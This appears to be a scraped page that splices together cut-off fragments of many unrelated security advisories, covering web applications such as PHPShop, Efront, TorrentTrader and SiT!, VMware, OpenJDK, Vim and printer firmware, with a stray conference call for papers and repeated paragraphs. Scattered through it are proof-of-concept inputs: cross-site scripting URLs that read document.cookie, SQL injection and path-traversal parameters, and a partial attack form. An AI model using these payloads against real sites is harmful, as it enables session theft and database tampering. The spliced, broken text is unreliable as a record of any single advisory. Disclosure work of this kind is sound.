Next Page >>
encoded
Reason: using unsanitized user submitted data for file operations
Attack vector: user submitted GET parameter "route"
Preconditions:
1. Windows platform
2. PHP version must be < 5.3.4 for null-byte attacks to work
Result: remote file disclosure, php remote code execution
Source code snippet from script "index.php":
-----------------[ source code start ]---------------------------------
// Router
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
structure your time however you see fit. If you think your
presentation will run longer, or have any special requirements, please
include this information in your submission and we will do our best to
accommodate you.
Note: If the presentation is based upon code or a particular
technique, the presenter must be one of the developers of the code or
technique and be prepared to perform a demonstration.
We look forward to reviewing your submissions, and anticipate another
great line-up for this year's conference. Once again, if you have any
http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes
Result: "MYSQL Error has occurred!"
-----------------------------[source code start]-------------------------------
if ($msg) {
$msg = trim($msg);
$res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");
$user = mysql_fetch_assoc($res);
http://localhost/mkportal.1.2.1/index.php?ind=blog&op=p_gal
They can also upload image files to the server. File uploading can be
dangerous without proper security checks. So let's have a closer look
at the source code of "modules/blog/index.php" line ~2452:
---------------------[source code]---------------------
function upload_imm () {
global $mkportals, $DB, $mklib, $Skin, $_FILES;
Remote Firmware Update (RFU): The Remote Firmware Update (RFU) feature is enabled by default. A firmware update can be sent remotely to port 9100 without authentication. This could allow unauthorized modification of the device firmware. The unauthorized firmware could impact the confidentiality and integrity of data sent to and received from the device. The unauthorized firmware could also cause a Denial of Service (DoS) to the device.
RESOLUTION
The following steps can be taken to avoid unauthorized firmware updates:
Update the firmware to a version that implements code signing
Disable the Remote Firmware Update
The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates.
Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table.
- - Direct remote execution of arbitrary commands without user interaction.
- - Direct exploitation of IE bugs without user interaction. For example,
exploitation bugs that normally require the user to click on a URL
provided by the attacker can be exploited directly using this attack
vector.
- - Direct injection of scripting code in Internet Explorer. For example,
remotely injecting JavaScript code into the embedded IE control of the
AIM client.
- - Remote instantiation of Active X controls in the corresponding security
zone.
- - Cross-site request forgery and token/cookie manipulation using embedded
- - Direct remote execution of arbitrary commands without user interaction.
- - Direct exploitation of IE bugs without user interaction. For example,
exploitation bugs that normally require the user to click on a URL
provided by the attacker can be exploited directly using this attack
vector.
- - Direct injection of scripting code in Internet Explorer. For example,
remotely injecting JavaScript code into the embedded IE control of the
AIM client.
- - Remote instantiation of Active X controls in the corresponding security
zone.
- - Cross-site request forgery and token/cookie manipulation using embedded
This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Consulting Services (SCS). Additional research
was made by Federico Muttis from Core Security Exploit Writers Team (EWT).
8. *Technical Description / Proof of Concept Code*
Internet Explorer uses a feature known as URL Security Zones [2], which
defines a set of privileges for Web sites and applications depending on
their apparent level of trustworthiness. The zones available in the
product include:
IMPACT
------
By exploiting either of the VMware flaws described in this document,
user-mode code executing in a virtual machine may gain kernel
privileges within the virtual machine, dependent upon the guest
operating system. The flaws have been proven exploitable on x64
versions of Windows, and they have produced potentially exploitable
crashes on x64 versions of *BSD. The Linux kernel does not allow
exploitation of these flaws on x64 versions of Linux.
implementation of the Java platform. This combines the two previous
openjdk-6 advisories, DSA-2311-1 and DSA-2356-1.
CVE-2011-0862
Integer overflow errors in the JPEG and font parser allow
untrusted code (including applets) to elevate its privileges.
CVE-2011-0864
Hotspot, the just-in-time compiler in OpenJDK, mishandled
certain byte code instructions, allowing untrusted code
(including applets) to crash the virtual machine.
CVE-2008-0016
Justin Schuh, Tom Cross and Peter Williams discovered a buffer
overflow in the parser for UTF-8 URLs, which may lead to the
execution of arbitrary code. (MFSA 2008-37)
CVE-2008-0304
It was discovered that a buffer overflow in MIME decoding can lead
to the execution of arbitrary code. (MFSA 2008-26)
Session Fixation [X] [_] [_] [X]
mail() CRLF Injection [X] [_] [_] [_]
Local File Inclusion (+CSRF) [_] [X] [_] [X]
File Deletion (+CSRF) [_] [X] [_] [X]
File Upload Vulnerability [_] [_] [X] [X]
Code Execution (+CSRF) [_] [_] [X] [X]
Legend: L - Low risk M - Medium risk
H - High risk T - Tested
Risk level: Medium / High
1) Input passed to the "clientid" parameter in "www/admin/banner-
acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php",
"www/admin/advertiser-campaigns.php", "www/admin/campaign-
banners.php", and "www/admin/banner-activate.php" is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
the context of an affected site.
2) Input passed to the "orderdirection" and "listorder" parameters in
"www/admin/userlog-index.php" and "www/admin/stats.php" is not
properly sanitised before being returned to the user. This can be
IMPACT
------
By exploiting the VMware flaw described in this document, user-mode
code executing in a virtual machine may gain kernel privileges within
the virtual machine, dependent upon the guest operating system. The
flaw has been proven exploitable on x64 versions of Windows, and it
has produced potentially exploitable crashes on x64 versions of *BSD.
The Linux kernel does not allow exploitation of the flaws on x64
versions of Linux.
*Vulnerability Description*
Insufficient argument validation of hooked SSDT functions on multiple
Antivirus and Firewalls (BitDefender Antivirus [1], Comodo Firewall [2],
Sophos Antivirus [3] and Rising Antivirus [4]) have been found that
could lead to a Denial of Service (DoS) and possibly to code execution
attacks. An attacker, utilizing these flaws, could be able to locally
reboot the whole system shutting down the firewall or anti-virus
protection. However, in some cases it may be possible to extend the
impact of these bugs, and they could lead to the execution of arbitrary
code in the privileged kernel mode.
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in PHPShop CMS Free, which can be exploited to perform cross-site scripting, sql injection attacks.
1) Input appended to the URL after multiple files is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The following PoC code is available:
http://[host]/phpshop/admpanel/banner/adm_baner_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/phpshop/admpanel/gbook/adm_gbook_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Remote Firmware Update (RFU): The Remote Firmware Update (RFU) feature is enabled by default. A firmware update can be sent remotely to port 9100 without authentication. This could allow unauthorized modification of the device firmware. The unauthorized firmware could impact the confidentiality and integrity of data sent to and received from the device. The unauthorized firmware could also cause a Denial of Service (DoS) to the device.
RESOLUTION
The following steps can be taken to avoid unauthorized firmware updates:
Update the firmware to a version that implements code signing
Disable the Remote Firmware Update
The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates.
Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table.
parameters passed from user mode. Additionally, some of the functions
accessible from user mode are inherently insecure and lead to easy
privilege escalation. All vulnerabilities are applicable to both
applications.
Analysis and code was developed for SUPERAntiSpyware v4.33.1000, but
the vendor released a new version of the product (v4.34.1000) - all
differences will be addressed and emphasized in technical details
below.
Vulnerable drivers:
These vulnerabilities were discovered and researched by Dan Crowley from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
8.1. *Nginx Web Server*
The following configuration snippet for Nginx Web Server will process
III) PHP filesystem functions path normalization attack
IV) PHP filesystem functions path normalization attack details
V) PHP filesystem functions path truncation attack
VI) PHP filesystem functions path truncation attack details
VII) The facts
VIII) POC and attack code
IX) Conclusions
X) References
I) Introduction
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Efront, which can be exploited to perform sql injection and cross-site scripting attacks.
1) Input passed via the "course" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?ctg=lesson_info&lessons_ID=1&course=%27%20onmouseover%3dalert%28document.cookie%29%3E
Application: Piwik <= 0.4.5
Severity: Piwik unserializes() user input which allows an attacker
to send a carefully crafted cookie that when unserialized
utilizes Piwik's classes to upload arbitrary files or
execute arbitrary PHP code
Risk: Critical
Vendor Status: Piwik 0.5.0 was released which fixes this vulnerability
Reference:
http://www.sektioneins.com/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability/
software link......: http://www.efrontlearning.net/
tested versions....: 3.6.7 - 3.6.9 - 3.6.10
+-----------------------+
| Remote Code Execution |
+-----------------------+
The vulnerable code is located in /www/editor/tiny_mce/plugins/save_template/save_template.php
8. if ($_POST['templateName']) {
http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file
Successful exploitation of this vulnerability requires attacker to be registered and logged-in.
2) Input passed via the "sel_domain_id" POST parameter to /obm.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http://[host]/obm.php" method="post">
These two facts combined could give us a good lesson. But, even after 1988,
we didn't learn how to deal with worms and I think we have a long, long path
to reach this point. So, imagine a worm using polymorphic techniques. It is
the worst nightmare we couldn’t even imagine.
-[ Polymorphic Code
This is not a new topic and some researchers have been talking about this
for years and years, but all our attention was gave to the shellcode. And
even during my research, when I talked to someone about the perspective of
having a real polymorphic code, people always got confused with polymorphic
1. Summary
Product : Vim -- Vi IMproved
Version : Tested with 7.1.314 and 6.4
Impact : Arbitrary code execution
Wherefrom: Local and remote
Original : http://www.rdancer.org/vulnerablevim.html
Improper quoting in some parts of Vim written in the Vim Script can lead to
arbitrary code execution upon opening a crafted file.
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
HP Openview NNM 7.53 Invalid DB Error Code vulnerability
1. *Advisory Information*
June 2009 [9].
A vulnerability was found in the way that WordPress handles some URL
requests. This results in unprivileged users viewing the content of
plugins configuration pages, and also in some plugins modifying plugin
options and injecting JavaScript code. Arbitrary native code may be run
by a malicious attacker if the blog administrator runs injected
JavasScript code that edits blog PHP code. Many WordPress-powered blogs,
hosted outside 'wordpress.com', allow any person to create unprivileged
users called subscribers. Other sensitive username information
disclosures were found in WordPress.
Gadu-Gadu is a free internet communicator used by milions of polish people.
It allows to talk, hear and even see other internauts through the net.
It also supports the possibility to express feelings using some provided
emoticons. These emoticons' strings with associated graphic filenames are
stored in "emots.txt" file.
The GG Client is vulnerable to a buffer overflow attack, in the code
that moves the "emots.txt" file data to some local buffers. The program
doesn't check if the size of data to move is not greater than the size
of the destination buffer. Successful exploitation may lead to arbitrary
code execution or the process' denial of service (gg.exe termination).
Next Page>>
|
